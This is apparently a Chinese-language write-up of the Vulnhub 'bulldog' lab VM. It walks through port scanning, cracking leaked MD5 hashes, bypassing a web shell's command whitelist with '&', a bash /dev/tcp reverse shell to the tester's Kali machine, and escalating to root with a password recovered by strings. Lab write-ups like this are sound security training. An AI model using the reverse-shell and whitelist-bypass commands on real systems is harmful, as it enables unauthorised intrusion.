Vulnhub----bulldog靶场笔记
前提条件
kali和bulldog靶机的的ip地址在同一个网段
本测试环境:
kali
:192.168.56.102
bulldog
:192.168.56.101
主机探测
利用kali的netdiscover
工具扫描靶机ip地址
kali和bulldog靶机的的ip地址在同一个网段
本测试环境:
kali
:192.168.56.102
bulldog
:192.168.56.101
扫描靶机端口
利用kali的nmap
工具扫描靶机ip地址
nmap -p- 192.168.56.101
扫描目标靶机端口的详细服务信息
nmap -p23,80,8080 -A -T4 192.168.56.101
web服务是python2
用浏览器访问192.168.56.101
并未发现异常;接下来扫描网站
发现了 /dev /admin robots.txt
/admin 是一个登录页面,SQL注入并未成功
/robots.txt 并未发现异常
访问/dev,发现了webshell连接,但是显示需要验证身份,可能需要先登录才能有权限使用此webshell
在注释中发现了异常
MD5值加密,使用在线解密网站解密试试。
成功解密两个账号密码:
- nick---bulldog
- sarah---bulldoglover
使用其中一个用户登录成功,然后使用/dev/中的webshell
白名单限制了使用的命令,通过&
绕过
- 现在可以使用
echo 'bash -i >& /dev/tcp/192.168.56.102/6666 0>&1'|bash
反弹shell到kali上 - kali上用nc侦听6666端口
nc -nvlp 6666
kali机成功获得反弹的shell
提权
使用普通用户的权限并没有发现要获得的信息,于是要提升root权限
在/home目录下发现bulldogadmin文件夹,看文件名觉得里面应该有东西
发现了隐藏文件夹,进去看看里面的东西
使用cat
命令没有发现异常,使用strings
发现下面了信息,去掉应该H是root密码---> SUPERultimatePASSWORDyouCANTget
在获得的shell界面直接切换root用户报错
于是使用python脚本
python -c 'import pty; pty.spawn("/bin/bash")'
输入刚才获取的密码即可
成功获取flag
后续技能学习:
- 反弹shell脚本,不仅仅限于bash方法
python -c 'import pty; pty.spawn("/bin/bash")'
此类常用的shell代码
Vulnhub----bulldog靶场笔记的更多相关文章
- sqli-labs 靶场笔记
sqli-labs 靶场笔记 冲冲冲,好好学习 2020年1月12号 先来点铺垫 分类: 按照请求方法分类: 1.Get型注入:注入参数在get的参数里. 2.POST型注入:注入参数在POST的参数 ...
- VulnHub 实战靶场Breach-1.0
相比于CTF题目,Vulnhub的靶场更贴近于实际一些,而且更加综合考察了知识.在这里记录以下打这个靶场的过程和心得. 测试环境 Kali linux IP:192.168.110.128 Breac ...
- Vulnhub DC-1靶场学习笔记
0x00 环境准备 本文介绍了Vulnhub中DC-1靶机的实战渗透过程,实战的目标是获取到服务器中的5个flag,最终目标是获取到root目录下的thefinalflag文件: 测试环境 备注 Ka ...
- (未完)经典Web漏洞实战演练靶场笔记
记录下自己写的经典Web漏洞靶场的write up,包括了大部分的经典Web漏洞实战场景,做个笔记. 0x01 任意文件下载漏洞 if(!empty($_GET['filename'])){ $fil ...
- CSRF漏洞实战靶场笔记
记录下自己写的CSRF漏洞靶场的write up,包括了大部分的CSRF实战场景,做个笔记. 0x01 无防护GET类型csrf(伪造添加成员请求) 这一关没有任何csrf访问措施 首先我们登录tes ...
- Vulnhub实战靶场:ME AND MY GIRLFRIEND: 1
一.环境搭建 1.官网下载连接:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 2.下载之后,使用Oracle VM Virtual ...
- vulnhub mrRobot渗透笔记
mrRobot渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/ kali ip 信息收集 首先依旧时使用nmap扫描靶机的ip地址 n ...
- (未完)XSS漏洞实战靶场笔记
记录下自己写的XSS靶场的write up,也是学习了常见xss漏洞类型的实战场景
- Vulnhub bulldog靶机渗透
配置 VM运行kali,桥接模式设置virtualbox. vbox运行靶机,host-only网络. 信息搜集 nmap -sP 192.168.56.0/24 或者 arp-scan -l #主机 ...
随机推荐
- 14.6、redis集群
1.环境配置: 服务器名称 ip地址 实例6379 实例6380 实例6381 实例6381 实例6381 实例6381 controller-node1 172.16.1.90 主 从 主 从 主 ...
- 9、zabbix监控
9.1.监控: 1.初级(凡人): (1)识别监控的对象: (2)理解监控的对象: (3)细分监控对象的指标: (4)确定告警的基准线: 2.预中级(飞仙): (1)工具化和监控分离: (2)监控对象 ...
- HDU 4438 Hunters 区域赛水题
本文转载于 http://blog.csdn.net/major_zhang/article/details/52197538 2012天津区域赛最水之题: 题意容易读懂,然后就是分情况求出A得分的数 ...
- Machine Schedule 赤裸裸的二分匹配 二部图中的点覆盖书==匹配数
Machine Schedule 1 #include <iostream> 2 #include <cstdio> 3 #include <cstring> 4 ...
- Linux:Ubuntu银河麒麟防火墙操作
查看防火墙状态 #防火墙状态 sudo ufw status inactive状态是防火墙 关闭 状态 active状态是防火墙 开启 状态 开启防火墙 #开启防火墙 sudo ufw enable ...
- 跨域解决之JSONP和CORS的详细介绍
JSONP跨域和CORS跨域 什么是跨域? 跨域:指的是浏览器不能执行其它网站的脚本,它是由浏览器的同源策略造成的,是浏览器的安全限制! 同源策略 同源策略:域名.协议.端口均相同. 浏览器执行Jav ...
- java基础---常用类
一.字符串类String String:字符串,使用一对""引起来表示,字符串常量池在方法区中 public final class String implements java. ...
- Podistributor播客分发系统介绍
特性 向用户暴露节目的别名 URL ,在用户访问时重定向至真实的目标资源 URL ,以高效地进行 CDN 切换和便捷地建立失效转移机制. 异步转发请求至统计服务,以解耦用户请求和数据统计,可方便地接入 ...
- python 异常获取方法
import sys #第1:print(6/0) #直接运行该命令,出现异常,程序终止 #异常提示: '''Traceback (most recent call last): File " ...
- VS Code 下载安装并设置中文面板显示
下载: 下载地址:https://code.visualstudio.com/ 微软在2015年4月30日Build 开发者大会上正式宣布了 Visual Studio Code 项目:一个运行于 M ...